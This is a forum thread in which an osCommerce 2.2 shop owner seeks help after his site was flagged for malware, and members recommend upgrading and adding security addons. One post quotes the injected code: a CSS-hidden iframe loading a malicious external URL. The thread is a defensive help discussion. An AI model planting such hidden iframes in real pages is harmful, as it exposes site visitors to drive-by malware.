Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Maleware injection in OScommerce 2.2 RC


FranzderFranke

Recommended Posts

Hello,

 

Today i get a mail from google adwords, that i got maleware on my oscommerce 2.2 rc website. Some maleware checker told me the same.

I got this problem one year ago. That time i installed a old backup and lots of Secure Plugins - even a nice guy from The UK Waltons lookt over it.

 

Today i reinstalled a sql backup from yesterday and everything seems fine - Maleware Checker says its fine now, too.

 

But i don´t know what the problem was. No Data from the webspace was changed so it looks like a maleware injection into sql.

 

I did 99 % of this: http://www.oscommerce.com/forums/topic/313323-how-to-secure-your-oscommerce-22-site/

 

 

I dont have much info about that maleware - Kaspersky told my : HEUR:Trojan Script.Generic / Adwords : Malware / Webmastertools: Nothing (but this don´t mean anything because they work slow)

 

What should i do now? Iam pretty sure this will happen again.

Link to comment
Share on other sites

You should upgrade your old version of osCommerce by nuking it and installing the latest stable version.

 

But then i have to start from beginning and i have lots of plugins for connection to merchandise management programms that dont work wiht new versions i think... :(

Link to comment
Share on other sites

 

It might be better to do 100%

 

Cheers

 

G

Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile

 

Virus Threat Scanner

My Contributions

Basic install answers.

Click here for Contributions / Add Ons.

UK your site.

Site Move.

Basic design info.

 

For links mentioned in old answers that are no longer here follow this link Useful Threads.

 

If this post was useful, click the Like This button over there ======>>>>>.

Link to comment
Share on other sites

Now i have more information about the iframe code injection:

 

8:< meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
9:< !-- EOF: Header Tags SEO Generated Meta Tags -->
10:< base href="http://www.xxx.de/">
11:< link rel="stylesheet" type="text/css" href="stylesheet.css">
12:< /head> < style> .hlc4ygqt3 { position:absolute; left:-1174px; top:-1822px} < /style> < div class="hlc4ygqt3"> < if​rame src="http://ugrpcfr.hopto.org/zwtzzadbm8tsfklpbl9h3bg9am7pbdvmvy" width="153" height="363"> < /if​rame > < /div>
13:< body marginwidth="0" marginheight="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0">
14:< !-- header //-->

 

Its only got listed by the bing robot.

 

btw. Did someone know if http://sitecheck3.sucuri.net/ Firewall is usefull?

Link to comment
Share on other sites

As 'burt' stated, the content of the hack code is not really important, but rather how the attacker was able to insert that code into a page on your website.

 

There are two usual methods, one is via a security hole in the web cart, which there are a few big ones in v2.2, or via a security hole in the webserver that the site is hosted on.

 

If you are intent on using v2.2, then after cleaning up your website you should install the osCSec addon.

 

http://addons.oscommerce.com/info/8929

- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX

Link to comment
Share on other sites

  • 2 weeks later...

The other point that needs to be stressed is that some shared hosting services are notorious for crap security on their servers. Luck of the draw you get a good one, many of the free hosting sites have little security and rely on suspending your free site rather than fixing their security issues, as their primary means of dealing with being hacked.

- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...